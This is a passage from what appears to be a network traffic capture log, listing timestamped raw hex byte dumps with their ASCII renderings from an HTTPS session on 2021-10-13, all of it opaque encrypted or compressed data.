37 fe 93 f2 8a ff de b2 43 a4 f7 36 e8 bf c9 48 40 3c 95 0d 55 b4 80 d1 82 72 1e 35 e2
                                                                      Data Ascii: \Vd~oY7eO\=q$q[x-]^V>qB|T":[PI:RHM/Tu[KofZ`J(TH}#HQW92BQ{2I7t"af<vr0H^E.JpNSX@.7C6H@<Ur5
                                                                      2021-10-13 16:06:31 UTC100INData Raw: 61 8b cc 1f 23 bc 93 3e b8 12 d8 14 42 07 5c 62 8b ae 31 90 c8 98 ed 1a 7d 5f 7d 9e bf 15 41 ca b8 08 07 c4 72 14 67 2a 93 d0 b7 db f1 4d 8c 1f ae 47 1c 6c 0b f0 a7 7b dc 67 21 15 11 f7 7a 9e 36 0e ba 9d 48 7c 2d 25 e5 c2 d6 ee 20 6d d6 0d 30 28 89 e3 76 ac 63 50 60 46 74 5a 59 4d 67 e3 42 73 a6 05 e4 21 6c d8 1e 3e 85 f8 a9 b7 ac ac c3 72 96 ad 19 67 56 84 e2 9d 1e 4d 39 08 2f 54 a2 cf a0 e3 bb 5f a5 41 f5 4d 2f 52 b0 4c 22 1b 07 15 d6 30 20 fa 1c 8f e4 8e b0 0f 86 67 cd b1 dd 68 57 6d bc 99 6f d5 25 60 3a af 88 3e 5c ac 28 ee db aa db e5 eb bc 8b af 6c f3 2d d5 69 b2 89 06 0d 5f 5f 28 9e 0c 80 3f 9d a5 8b fd 13 1a 19 53 52 e5 de 83 96 87 1f 22 f2 2a 9c d7 9f df 61 9c ce 9b dd c3 77 34 68 6a 12 47 eb 34 dc 63 9b 50 14 c5 56 b9 fc 72 cc 0f 9e 4f 0b 5c 4e
                                                                      Data Ascii: a#>B\b1}_}Arg*MGl{g!z6H|-% m0(vcP`FtZYMgBs!l>rgVM9/T_AM/RL"0 ghWmo%`:>\(l-i__(?SR"*aw4hjG4cPVrO\N
                                                                      2021-10-13 16:06:31 UTC102INData Raw: 20 4d 41 71 96 33 de a4 7d 2b 49 70 89 c5 5a 3d e9 5d 08 a3 9c ad 59 d5 f0 52 3f 33 05 92 cf 8c f8 da 4a 42 99 f3 01 13 86 0c a5 b7 c0 c4 04 64 b1 84 bb 18 72 1e e7 e9 f1 07 b2 bb 8d 3e 98 73 a6 8c d3 a3 ba 94 c7 bb 22 3f de 21 bd e9 8b 8b 92 a2 e6 c4 59 3a e5 10 45 a0 00 9e c2 5e ca 69 69 38 06 99 e3 45 83 fe 44 d5 f8 13 c7 65 f4 76 3b 62 7f 60 e2 6e 2b 4e 8e 48 9f 77 ba 14 a7 bf 6d a8 c2 fa 11 2d 8d f6 f2 3a 3b 7a fe 56 fa 6c ba f3 e5 83 9e 73 9f f4 4b 52 25 1b 88 a0 6a 7d cd 18 dc e9 02 25 08 4a 78 f1 d6 e3 f0 7d da bc 06 b0 e2 b9 00 e2 96 cc 85 6b 16 d5 98 c7 4e d1 69 67 d1 b4 b0 8f e8 54 2c e8 16 1a 26 e1 09 b9 c6 9c 9d ab eb 6e dd 76 6e 40 8b 1e 25 4f cb af 10 55 3f a2 b5 eb 0f bd e6 3e 60 37 59 8f ef c2 37 6b f8 01 f3 aa 4a 1a 89 5d 5e 68 c1 ea 06
                                                                      Data Ascii: MAq3}+IpZ=]YR?3JBdr>s"?!Y:E^ii8EDev;b`n+NHwm-:;zVlsKR%j}%Jx}kNigT,&nvn@%OU?>`7Y7kJ]^h
                                                                      2021-10-13 16:06:31 UTC103INData Raw: 0d e4 33 62 a4 a3 ff 7c 0a 63 49 57 e9 c5 84 80 f8 3b 32 f6 31 e7 ed 9f f3 61 91 f6 82 e0 47 71 34 73 43 b7 83 1b 27 f6 89 8f 0c 1a c4 4d d2 ac 64 cb 8b f5 22 f2 33 86 d8 d1 f9 24 2f 01 45 ec bb 93 ba 0f 86 2f ea e2 e7 ee 93 0b db 0a eb 03 dc 45 4b 57 06 48 f7 a9 33 99 16 54 07 13 e1 61 25 d3 97 71 57 87 3e 75 cc 1c 72 e9 aa df e0 19 b5 1c 04 cc 77 da cd 9d c9 80 d7 86 52 a4 dc 85 34 c0 3d e3 7c d6 df 82 2d ee a3 88 e4 29 02 6f 06 b8 69 1a 9b 01 df 3f 97 a6 04 03 a4 3a 96 5c fa df 7e 1e b0 97 c1 cf b9 4e eb c1 83 b7 40 44 a2 c4 ff 68 49 28 85 5c 48 4c b8 92 4e d0 c5 fa c0 9e 32 e9 5c f2 f1 54 d1 64 f0 1e a2 03 77 b3 97 9a 84 d2 1e 6e 4f 76 3b 4a 61 3e 45 0d c9 c0 30 c8 78 b1 0d 47 26 9b 9a 4f 1a d3 9f 90 71 f9 85 ab f4 70 dd bc 6e 8c 8a f1 e7 c8 2b 2c de
                                                                      Data Ascii: 3b|cIW;21aGq4sC'Md"3$/E/EKWH3Ta%qW>urwR4=|-)oi?:\~N@DhI(\HLN2\TdwnOv;Ja>E0xG&Oqpn+,
                                                                      2021-10-13 16:06:31 UTC104INData Raw: 70 36 fb 65 0b 39 1f 0c 9c 5f 28 7b f8 6e 6d dd 78 7b 08 9f ac 24 4f c5 8e d2 46 39 a2 bb f2 03 ba 18 2e 44 35 a5 f5 cd ca 0f f3 fb 7a ea b4 43 0d a9 c4 4d 60 d4 dd e0 87 14 fa 3d dc a5 4e da 56 22 45 46 50 63 36 cc fe f9 29 3a 9e 0c cd 92 c1 c0 09 4d fc af 92 35 d6 11 44 3c b0 ff c6 d9 b9 44 c7 e0 fb da 7c 77 f6 98 1e 0f bc 95 12 af de fb 11 5d 3b 4f 6a 8b 64 39 8f cf 15 60 36 6c 56 21 e7 a5 1c 2e 05 a7 48 94 15 81 ef 70 52 f5 d8 b7 c0 a8 4d 79 c0 93 40 10 2e 15 fb 68 79 cd b5 26 31 78 b6 69 9b 26 c1 b5 b7 59 75 22 3c 1b c1 fa e6 23 20 e4 08 54 55 92 e2 76 b3 4c 4f 73 49 75 4b 51 8e 6d 1d 52 5d fa 7d ba 35 11 fc 6a 02 81 e7 a3 89 af 84 fc 78 80 55 6b c8 57 93 fb ef 1c 0c 5e de 0a aa a5 e9 8a 5b bc 67 6f b0 22 21 07 52 ba 40 38 55 97 15 aa 3a 08 3a fd 8f
                                                                      Data Ascii: p6e9_({nmx{$OF9.D5zCM`=NV"EFPc6):M5D<D|w];Ojd9`6lV!.HpRMy@.hy&1xi&Yu"<# TUvLOsIuKQmR]}5jxUkW^[go"!R@8U::
                                                                      2021-10-13 16:06:31 UTC105INData Raw: 5c c2 68 f2 74 a6 1d 6d 49 f9 3c 8e da 03 d2 41 12 31 58 69 3a 82 2d 4b cf ce c3 42 bb 67 ed 2e 84 9c 86 39 fb 9a 90 6a 80 82 54 f5 58 d5 b0 06 8a 8b e0 eb c0 f8 05 6b b0 ae 4a 70 3c cc be b5 74 3b 5e 3c e0 3d 55 ee 91 39 79 8c 7c f1 70 fb 01 57 17 08 4c 69 02 c2 36 65 67 ff 70 69 50 b1 8d cd 05 eb ed 37 84 de b2 ba 01 55 21 d6 a2 44 b9 54 64 7d d2 6c 42 43 55 17 a3 55 91 c1 d1 f0 49 2a 21 e4 86 f0 87 e0 d8 44 5d 83 0b 1c c1 8b 29 aa a7 87 96 e1 9a 4e 9f d8 93 7a 1e fc ea f5 ea b5 97 92 3c 84 ea ef 97 25 a3 62 fc ce b6 38 28 c0 09 35 e3 94 92 7a bb a5 62 5a 32 f1 d9 75 38 04 9e d9 4b d3 7c 83 2a 22 96 f1 36 b9 e4 ba d0 ed a2 ce 74 f3 58 58 6e 65 73 fb 68 27 b8 90 6b 71 7e 95 7b 86 bd 65 b3 b9 b4 39 16 86 fc e6 54 21 7b ef 54 fa 68 57 fa c9 88 94 17 89 0b
                                                                      Data Ascii: \htmI<A1Xi:-KBg.9jTXkJp<t;^<=U9y|pWLi6egpiP7U!DTd}lBCUUI*!D])Nz<%b8(5zbZ2u8K|*"6tXXnesh'kq~{e9T!{ThW
                                                                      2021-10-13 16:06:31 UTC107INData Raw: 59 7c e7 7b fb 26 e0 24 6b 02 84 d0 9b 9b a7 8e ef 0b 98 aa 6a e0 3b 1f ea e7 16 91 c7 c1 2e 55 b2 ed 14 71 b9 55 83 48 cb d4 f3 21 b8 51 23 18 85 14 d6 3e 0a 2b 19 98 88 47 03 1e 3f 7e e4 b1 d7 7a 2c 56 80 8b 6d ff cb 6c 3b a5 9f 32 49 d2 bd 83 4d a2 fd ed bd 98 88 ff 79 f4 5e aa a2 b3 8d 16 30 45 f9 43 d4 09 fb 2c ba a7 f4 fb 03 1f 66 40 45 8a 4a 90 93 f6 1d 34 f8 f0 d1 11 e5 d1 66 ba d8 f2 73 56 75 3e 74 2d 95 f1 1b d9 25 43 81 5f 23 c5 4d dc 83 4a cc 05 48 93 5b 25 ac d4 e4 a3 2b 2b 01 54 e8 a4 85 56 0e aa 3e 54 e1 9c e1 5a 0a df 65 7f 03 dc 4f 5a 48 11 5a e0 99 20 9d 21 5b f9 12 c5 76 27 b9 8f 7b 7c 98 28 5a 41 e0 73 cf be dd 84 b0 b2 0a f0 d2 4b cb de 96 d8 83 d0 6f ad 89 f2 95 34 90 d0 e0 07 c8 c0 0f 02 c4 d9 8b c1 37 14 70 5c 26 7f 17 ac f1 43 36
                                                                      Data Ascii: Y|{&$kj;.UqUH!Q#>+G?~z,Vml;2IMy^0EC,f@EJ4fsVu>t-%C_#MJH[%++TV>TZeOZHZ ![v'{|(ZAsKo47p\&C6
                                                                      2021-10-13 16:06:31 UTC108INData Raw: 3f 39 2a 9c e7 2a 8e 13 40 d1 c7 bd 4b 62 f4 69 31 65 6d 74 e4 40 91 b0 8f 6e a9 54 e3 68 97 96 80 a8 ad 64 07 a0 80 fc ec 28 29 6e fb 78 46 78 44 f8 dd b1 72 0c 91 f3 5d db 25 95 3f 17 56 f0 db 30 75 ff 1a 40 89 5b 78 fb c3 fa eb 6f f2 42 04 af e8 50 8c c9 9f f4 8b 79 12 c4 83 dc 75 27 6d 76 d1 09 b4 75 fd 6c 22 c2 ce 14 27 eb 25 05 48 2b 21 af 70 47 e5 7b 6c 70 09 b3 25 49 d7 3d 01 46 39 a3 b0 f9 04 9a bb 3f 4c 21 4f dc 10 c7 37 69 ed f7 ed ab 4a 1f b5 d0 48 40 68 fc 1e 8c 10 5e 3f a7 a1 67 6f 52 2b 20 e2 3c 9c c3 2c db fe 09 c8 8b 04 d4 8f b2 c6 25 5d f9 bd 90 27 70 05 2b 67 ba d7 96 d2 a6 42 de 36 eb ee 5c 5f e4 66 15 2e a0 8e 3c 80 09 e8 1d 9c 28 5a 48 8b 75 31 d1 c5 eb 61 1a 7d 55 71 9c bc 1d 2e f2 b8 08 01 1b 7f 10 6f 55 e6 d0 b7 cb a0 5a 86 da 8f
                                                                      Data Ascii: ?9**@Kbi1emt@nThd()nxFxDr]%?V0u@[xoBPyu'mvul"'%H+!pG{lp%I=F9?L!O7iJH@h^?goR+ <,%]'p+gB6\_f.<(ZHu1a}Uq.oUZ
                                                                      2021-10-13 16:06:31 UTC109INData Raw: 27 a8 93 7b 89 a9 39 4c 39 d9 72 e3 b6 ff f6 4f 4a e3 d0 c5 76 d8 bc a6 d8 84 c9 bd a0 b4 e1 cb 0d bb 33 e3 13 85 c1 0f 0c 32 8b 7c ed 20 12 5a 51 0e 60 0d 84 0b 27 36 8f bf 98 0a bd 0b 0a 55 e0 c2 e2 17 ab b9 5d c6 a5 54 77 c8 9e a1 dc 4d b4 d8 90 c1 49 6c 8f 43 50 75 bd 92 5f ba db f0 3e 89 1e c0 5e 89 ff 55 d1 62 f2 65 ae 89 76 b7 f8 08 86 d2 14 a7 4c 0d 2a 47 61 3a 93 25 54 c2 30 c0 6e af 62 57 27 9b 90 ca 11 c0 9b c3 62 fd 99 43 f5 5c ca be 15 82 8b ea d3 de 06 f1 45 b3 b6 b5 78 3c cc a8 27 56 c5 5f 11 fc 37 2e 5a 9b ef 5b 14 78 e0 7c e2 36 d9 06 00 4a 6f 87 da 26 9b 67 c0 6f 7d 25 ba 9d c4 a3 ef 8d 64 dc 30 42 51 0a 53 bf f1 a2 55 b0 58 60 92 c3 56 45 dc 4c 18 be ab 1e 4a d3 fa 65 28 34 ed 03 cf 90 f1 c6 5a d8 a0 e4 1d ed 8d f0 a7 bf c3 a4 36 71 b1
                                                                      Data Ascii: '{9L9rOJv32| ZQ`'6U]TwMIlCPu_>^UbevL*Ga:%T0nbW'bC\Ex<'V_7.Z[x|6Jo&go}%d0BQSUX`VELJe(4Z6q
                                                                      2021-10-13 16:06:31 UTC111INData Raw: a6 77 83 e8 f7 cb 74 68 e4 66 1f 23 b6 e3 73 b8 1c f2 17 42 29 47 52 88 75 9d 90 d9 eb 8f 1a 7d 44 59 9b b9 1d 28 72 02 0a 01 e2 72 18 00 f9 e4 d0 bd dc de c9 87 c1 b5 48 01 52 7e fb 79 7b c7 4d 0c 45 6f a6 15 fa 3c d2 b7 c3 0a 7d 3d 24 f6 c4 d1 96 b3 70 f5 07 55 31 88 e3 7c 9b 7f 44 64 69 7d 5f 59 97 08 23 51 71 fc 56 5f 20 6c d6 47 10 94 fc 80 93 a2 84 eb 1f 56 a9 6a ee 3b 91 e8 e7 16 16 47 c5 41 95 a6 c5 82 77 91 ba ac 4c db a0 be 52 ba 4a 44 1d 94 15 dc 31 19 3c 72 e9 e2 9d be 24 76 2d c3 a0 d1 57 56 57 87 e4 3e fd b0 68 e6 a2 91 e5 4a 98 05 b6 4d a8 d1 fc c3 be 83 fa 7d f0 2f 92 9b b3 89 0a ff 41 48 06 8e 15 fb 26 9e a5 97 f5 6f 9a 62 45 53 e5 da 92 93 fc 3b 23 67 bb f3 06 84 df 67 bb c7 ad fd 54 cf 34 62 47 47 99 e5 37 f2 96 88 77 12 d1 65 14 a9 72
                                                                      Data Ascii: wthf#sB)GRu}DY(rrHR~y{MEo<}=$pU1|Ddi}_Y#QqV_ lGVj;GAwLRJD1<r$v-WVW>hJM}/AH&obES;#ggT4bGG7wer
                                                                      2021-10-13 16:06:31 UTC112INData Raw: e3 39 00 fe 85 5f c4 20 4d 4f 36 13 30 de a4 7d 9f 49 70 85 bc 38 52 40 57 05 ab 85 d6 80 d1 f0 49 26 28 e1 84 8c 7b e1 c9 4a 54 a0 e4 1c ed 8d 2c b2 97 d2 ba 1e 63 de 99 d5 80 78 27 5a e3 ec 14 9c a9 99 38 81 69 51 a5 ec b1 b8 e9 a6 a3 23 3b c2 25 28 e2 a3 95 81 ba 8f 45 7d 3a ef 05 50 b1 00 f1 19 5a d5 69 88 01 30 80 8f ca a7 ff 42 f9 d6 aa c6 6f dc 3e 32 71 7f 48 dd 6a 36 b6 e0 1c 8f 7f b3 47 b6 bc 6d a6 be 65 06 3e 8f c4 bd 28 3d 7a fe 57 e7 03 73 f3 c9 9d f3 c3 93 f5 41 8c 3a 4d 28 cc 55 32 42 0d d6 ff 1b 59 a8 5c 69 fc cb 8d d4 7a da a9 6f 64 ec 47 0b 14 87 2c 9d b0 05 c4 94 c0 76 ef 78 7f c6 a1 a7 77 86 b2 34 ea 67 1c 36 e9 d5 a8 9e 3a 21 9b aa ba c5 6b 17 ac e5 b7 23 67 d6 b1 06 4c 11 f5 a6 ed 16 9a 36 3d 4c 2d 34 8c e1 c3 3d cd ea 70 fd 7d 59 14
                                                                      Data Ascii: 9_ MO60}Ip8R@WI&({JT,cx'Z8iQ#;%(E}:PZi0Bo>2qHj6Gme>(=zWsA:M(U2BY\izodG,vxw4g6:!k#gL6=L-4=p}Y
                                                                      2021-10-13 16:06:31 UTC113INData Raw: 98 07 22 cf f9 25 97 df 21 49 67 a4 8f f3 1d 14 71 42 53 f4 d1 8d 8e 02 3a 0f e2 3f f5 10 97 c8 b1 2b b3 66 f4 54 73 2b 7c 54 a3 99 f4 2d c5 91 73 76 38 cc 75 76 55 8d 33 1a 4f 5e 50 33 97 d9 d1 fc c9 2a 2d 45 ef cb 79 45 0e ac 2f e4 8f 4e e3 92 01 c0 7a 60 08 dc 5e 4b 54 ef 5a df a1 21 94 98 48 f3 0f de 7d 27 b9 92 67 a9 82 04 5e 4e 0d 79 e3 ad ce 90 af 4b 1d 22 c0 64 c0 de 4b 49 93 12 86 7a 28 db be 36 ba 3f fd 5c c1 ca 0f 17 e5 bc a4 17 21 38 63 55 2d 77 db 15 5d 99 21 59 30 b3 0a bd 27 06 4a ce da e9 17 ba 8a 42 dd 5b 59 5b c3 ed a1 de 4d b2 c9 96 de 55 3b 84 43 41 54 a3 a7 a1 d5 f6 f9 06 19 1f c0 5e 96 c9 46 da 60 e3 6e b1 27 89 b6 d4 32 81 bd e8 05 4d 0b 2d 24 9d 3b 93 23 3b 12 32 c2 64 b8 b8 81 f7 99 90 5a 19 af 64 91 60 fb 86 73 e6 57 ca af 1e 9d
                                                                      Data Ascii: "%!IgqBS:?+fTs+|T-sv8uvU3O^P3*-EyE/Nz`^KTZ!H}'g^NyK"dKIz(6?\!8cU-w]!Y0'JB[Y[MU;CAT^F`n'2M-$;#;2dZd`sW
                                                                      2021-10-13 16:06:31 UTC114INData Raw: 3e 31 69 b7 ce 88 61 b2 40 89 b2 dc f2 0b 5b ad 96 2c 0a 68 14 d6 3c 0f 55 e1 8e e2 9b db d9 eb f3 c5 a6 0d 14 80 44 81 81 06 07 b1 62 3c 73 96 24 78 ae 26 81 5c a3 c4 c3 38 97 a5 ee 7a 99 d9 bb a3 b5 98 07 4e 93 4c 2c 85 16 d6 35 97 a5 9e fe 1d 3e 9c 48 7f e8 d9 1c 24 f5 23 f5 28 3d f7 0c bc cc 6c ba cd 96 ea 6e 8b 35 4e 56 af f6 19 27 da 9b 9c 7f 7b 17 4f d6 a1 6d f7 16 49 4d 4a 38 99 c7 30 e3 1b 22 09 da 5f b7 81 5b 18 b9 35 e2 f1 97 fe 85 f5 de 49 65 04 b3 b3 41 48 17 59 fb c6 d5 9c 09 5d 96 c0 cf 76 2d b7 81 63 5c 83 39 56 49 5e 8c e2 90 d4 8c b9 ad ca 06 c5 76 cd e1 8b d9 84 c2 8e ed b6 fb be 27 b0 2c db 82 d3 ed 1f 17 e6 a0 80 fe f6 85 1f ad 25 60 0b 9b 70 50 3d 8f ac 93 15 8f d8 0b 79 f1 ca eb 0f 7d 89 4b d7 a1 70 61 c9 9e ab c3 7e a7 d1 90 d0 42
                                                                      Data Ascii: >1ia@[,h<UDb<s$x&\8zNL,5>H$#(=ln5NV'{OmIMJ80"_[5IeAHY]v-c\9VI^v',%`pP=y}Kpa~B
                                                                      2021-10-13 16:06:31 UTC115INData Raw: 6f 89 d2 4e ac ad 62 11 2d 87 dc ac 72 15 eb ef 50 ef cf 39 b1 c8 99 98 0a 93 8e 08 57 22 91 28 cc 55 32 42 33 d6 ff 1b 37 e4 4b 78 ff e3 f6 e3 7b c9 9d 05 af 91 46 01 ce 68 f4 8a 7b 00 c6 82 f2 34 d6 69 76 d7 ba a0 6d 17 79 1a e0 6e 12 1b 66 0d b0 48 36 38 86 72 7d d8 61 86 59 c8 a0 27 34 84 b1 06 42 3b d9 e2 ec 10 b6 10 29 4f 03 6e f5 e1 c9 29 7c fe 7a fb ae 50 e0 a0 e8 4d 6a b0 bb 1f 86 3c e8 44 e1 aa 4f de 88 21 31 cb 57 63 2d d6 c5 14 20 16 8a 12 df 83 2c c4 25 4c fd be 7a 32 74 a5 33 74 b5 ff dd d7 bd b6 d5 c4 f1 cd 62 56 19 66 1f 23 aa 97 11 b8 18 ed 0f bc 29 70 6c 88 62 eb 87 0f 66 4a 1a 7d 54 7d 85 af 18 2e 10 bc 17 0b 16 7f 29 fb 45 e6 d0 b5 aa e5 5b 87 c5 bd 38 4e 3c 1d ff 71 67 d2 63 12 1c 7e aa 78 9c 40 95 bc b7 4c 6b 15 2f e5 c0 fd 95 66 71
                                                                      Data Ascii: oNb-rP9W"(U2B37Kx{Fh{4ivmynfH68r}aY'4B;)On)|zPMj<DO!1Wc- ,%Lz2t3tbVf#)plbfJ}T}.)E[8N<qgc~x@Lk/fq
                                                                      2021-10-13 16:06:31 UTC116INData Raw: a8 f0 af 3b a1 cd e3 50 f1 c3 74 42 ef a3 8d c1 27 16 70 50 32 69 79 05 4a 43 37 8d c6 d1 0b bd 22 84 e2 fa e1 d7 16 ab 8b 46 d5 a8 58 66 c5 81 b3 22 4c 98 f8 81 c7 5f b2 a7 52 50 5f b6 42 4d d4 da eb 16 8b 1e c0 54 a1 cb 54 d1 6a 86 77 ae 02 6c bd e7 03 95 df 14 15 40 12 26 b5 60 16 a4 23 45 c7 36 d3 6b 3e ee c5 26 9b 91 58 06 4d 9c 90 60 fc 8a 52 e4 5b dc af 10 0e b4 f1 e3 d6 a4 15 40 a7 9e f7 78 3c d7 9e 47 7c c5 55 38 33 3c 5d fb 07 f0 5c 14 73 f1 6b fb 01 4e fa 01 60 75 1b d5 31 0b 5f c0 9e 93 d4 b3 98 de 0c fe 92 7a cc 38 b3 44 32 54 30 a5 e6 54 b1 4f 65 c3 a0 41 52 40 42 12 ba 8e b9 5b de ef 4a c7 25 d7 a2 e1 f4 a8 c8 4c 46 80 81 0f ed 87 3b a3 b7 d7 97 9f 67 b1 86 c2 0d 75 1e ed e3 f8 00 a0 93 3f 38 87 6e 70 d7 ff b4 b2 80 14 b8 22 31 c4 16 2e f8
                                                                      Data Ascii: ;PtB'pP2iyJC7"FXf"L_RP_BMTTjwl@&`#E6k>&XM`R[@x<G|U83<]\skN`u1_z8D2T0TOeAR@B[J%LF;gu?8np"1.
                                                                      2021-10-13 16:06:31 UTC118INData Raw: 61 bd 7d 55 71 67 bc 1d 3f 17 aa 0d 2a ab 7e 01 6a 52 18 d1 9b d2 b8 49 82 c1 ae 46 10 c3 1c d7 77 73 bb 82 27 1d 74 b8 27 88 12 f5 a4 a4 4d 7d 2c 20 fc 3e d7 c4 25 64 df 17 29 2d 89 f2 73 a1 ad 54 4c 42 62 49 5c 91 76 e6 49 8f f7 52 e8 0b 6e f7 d0 00 ea 31 a8 9a ad e8 ce 70 96 ab 6a e4 54 84 a8 bc 3f 1d 56 c1 2e 54 a4 35 b7 29 91 ce af 4c d7 69 3a 84 37 6b 2b 65 95 1e c0 3d 86 8d 0a 55 f1 99 b9 22 cb f1 c6 a9 0f 63 3e a9 81 8b 63 f1 b7 6b 32 85 98 39 5f bd 05 63 4f a8 d1 c7 25 94 89 f5 e1 ff 32 6c ae ba 98 04 10 98 49 06 8f 1a cb 25 9c 1a 8f f5 02 e3 62 49 42 f3 c9 97 ab 57 3b 23 f2 2e e2 16 87 21 66 96 da 9f e6 50 6f 27 67 47 b9 9c f9 d8 db b1 85 66 10 cc dc da b6 61 c9 05 53 48 40 cd 87 fe cb c9 55 37 12 51 e8 b5 80 5a f0 ab 12 ea e9 8b 37 9f 14 d6 76
                                                                      Data Ascii: a}Uqg?*~jRIFws't'M}, >%d)-sTLBbI\vIRn1pjT?V.T5)Li:7k+e=U"c>ck29_cO%2lI%bIBW;#.!fPo'gGfaSH@U7QZ7v
                                                                      2021-10-13 16:06:31 UTC119INData Raw: 25 59 f1 43 3f 4b 63 93 e3 85 eb d8 48 4a e7 02 1c ed 81 2d a4 b8 d7 97 f1 61 b1 86 c3 0d 75 1e ed e3 ff 0a a5 a5 8a 10 a2 61 58 8b 5d a5 a6 fb dd ae 0a 98 c8 09 2e fa 8c 95 ac 55 8d 6d 5f 2d 62 08 5d b3 07 8d cc 49 ca 75 bf 1f 2f 96 e6 9c b7 e0 50 c5 d5 83 65 65 f4 63 18 4c 7b 60 f9 40 83 b0 8f 6e b6 b2 b8 6f 83 b7 79 84 6e 61 11 2b 90 71 eb 29 3d 7b fc 70 f4 58 52 e4 45 a6 9c 08 90 57 5a 76 36 81 2b 3e e1 e4 cf 12 c2 d7 d9 49 a1 4c 6f 76 ce f6 e3 7a c9 8c 11 8e f8 51 8d f1 9f f4 8b c8 07 f4 93 de 49 ff ca 76 d7 a1 b1 59 2a 7b 36 ec 7a 99 20 e1 0d b1 5b 09 3a a1 64 7b 51 43 78 58 e5 15 34 6d d5 a4 12 6e 9a a2 a4 e7 04 9a db 3c 4c 2d 4c 79 e6 c3 37 6e e8 59 fb 88 5c 08 2d fb 5c 68 ca 5e 0f a5 2c fe 2b 8f 08 4f da 58 3f 02 1c 51 63 3a c5 51 ed 21 3a 8e 10
                                                                      Data Ascii: %YC?KcHJ-auaX].Um_-b]Iu/PeecL{`@noyna+q)={pXREWZv6+>ILovzQIvY*{6z [:d{QCxX4mn<L-Ly7nY\-\h^,+OX?Qc:Q!:
                                                                      2021-10-13 16:06:31 UTC120INData Raw: 17 94 02 91 b8 dc 9d d0 7c 42 34 62 4d bb 8b f1 2c f2 a5 8d 77 1e 18 af d4 ab 72 ce 2d 65 48 5b 35 ae f6 ce e2 3d 03 30 54 e8 ae bc 8d 0c aa 3e f4 6d b7 e1 92 0a cc 7e 71 2b fb 4a 40 4e 39 7f f3 a9 28 ee fa 5a f9 14 de 62 36 bc f6 81 56 83 2e 32 b0 1c 72 e9 af e0 b7 be b4 1c 0e c1 42 e1 2e 9f d8 8e 44 bb ac a5 eb ad 2a aa 2f f6 54 fa c5 0f 00 f8 2e 8e e9 20 15 64 42 30 48 ae 84 4a 49 1e a7 b8 98 0c ab 0e e2 57 e0 c3 f3 0b bf a9 75 c2 a5 5e 61 45 99 a1 dc 4c a0 ce 84 e9 ea 28 8f 49 78 76 b9 92 59 c2 f2 18 3c 9f 14 e8 b7 8b ff 5f c0 7c e6 4d 86 06 77 b1 ee 9d 81 d2 14 05 59 19 3e 63 c2 3a 93 2f 7c e8 35 c2 68 b9 4a 06 24 9b 9a 78 f8 c2 9b 9a 48 48 99 55 ff 70 d7 af 09 96 a3 76 e0 d7 00 12 ca b4 b6 59 79 28 c9 a2 82 de c5 5f 1a c7 a2 5d f1 91 fc 4b 16 62 e5
                                                                      Data Ascii: |B4bM,wr-eH[5=0T>m~q+J@N9(Zb6V.2rB.D*/T. dB0HJIWu^aEL(IxvY<_|MwY>c:/|5hJ$xHHUpvYy(_]Kb
                                                                      2021-10-13 16:06:31 UTC121INData Raw: 5e c8 a1 0c 51 ef cd 4f ef 10 b8 77 b8 4d 2b 51 ec 8e 4b 36 6f f1 15 63 aa 4a 14 b2 c0 43 7d d8 eb 1e 97 2f f5 26 59 aa 63 ce 43 2d 3b dc 7a 05 3d d3 d6 85 d6 3b 8f 02 c1 8b 20 db 36 4a f8 b8 93 2c 40 58 2a 4b ba f6 f5 08 58 b7 2b f7 e2 d8 63 68 f5 71 00 2a 48 85 38 b3 18 fd 06 56 b2 4f 67 94 7f 22 87 d9 fa 76 05 76 ab 70 b0 ac 0c 2b 29 af 0a 01 ee 44 01 6d 45 e6 cf bb c2 b7 5a 96 d6 a0 5f f6 3c 31 ef 68 60 aa 07 26 1d 7a b1 69 b6 20 d0 bd b1 5b 71 22 38 f6 d7 d6 f9 37 6f f9 f3 3b 04 80 db c5 b6 53 55 7f 4c 66 4d 59 80 70 fc 7b 8f f7 52 e7 31 66 cd 7d 3c e8 fa a8 9a b8 ad fe 67 96 ba 7d ff aa 85 c4 ee 62 8e 56 c1 24 59 b8 d6 9f 70 a8 48 b0 53 23 df 01 71 ab 4d 44 99 95 15 d0 2c 67 eb 1f 8f e8 f2 48 08 e9 f5 d7 de 06 79 51 4c ee 75 68 fd b6 71 34 ba bb 28
                                                                      Data Ascii: ^QOwM+QK6ocJC}/&YcC-;z=; 6J,@X*KX+chq*H8VOg"vvp+)DmEZ_<1h`&zi [q"87o;SULfMYp{R1f}<g}bV$YpHS#qMD,gHyQLuhq4(
                                                                      2021-10-13 16:06:31 UTC123INData Raw: 25 52 d4 5f 13 6c af 68 81 da 9a 90 56 09 af 4a 92 60 f7 f6 ab f4 5c cc ad 1b 93 85 8f af d6 06 00 56 bc 9e 45 7a 3c db a5 a1 0e e7 5d 10 e9 2d 4d e0 8b e7 3e 2f 7c f1 7c e7 0e 4c 08 28 61 7d 0a db 0e b5 64 d3 67 44 c7 ae 8c c7 6e da 81 77 d5 30 5d 54 15 6c 1f db a2 53 99 65 72 83 d5 68 be 42 5d 02 c6 a5 bb 4a d5 e1 53 3a 4b d1 91 e3 89 e6 d8 5c 2d 9d f4 1d e7 59 2f 90 97 f4 bf 1e 6f a2 94 fc b8 72 1e e7 3c ec 05 be ac 4a 2b 8d 75 52 9c e8 8a cd 11 36 45 33 2e df df 37 fe 9a 94 95 ac 07 da 66 d1 12 f0 a2 b5 2c 9e 92 6c d5 63 97 39 2a 96 b3 3e a6 ff 4f d1 c1 ab 98 65 f4 69 22 71 79 60 e9 68 36 b1 8f 64 8f 7f 24 6f 83 be 00 ad ad 62 1b 2f 87 fc e3 29 3d 7a f5 50 e5 79 5f c2 c0 99 c6 09 91 f5 4e 57 22 84 3d 1c 40 f2 a0 f9 d7 ff 10 55 fe 79 70 f9 de 99 eb 7a
                                                                      Data Ascii: %R_lhVJ`\VEz<]-M>/||L(a}dgDnw0]TlSerhB]JS:K\-Y/or<J+uR6E3.7f,lc9*>Oei"qy`h6d$ob/)=zPy_NW"=@Uypz
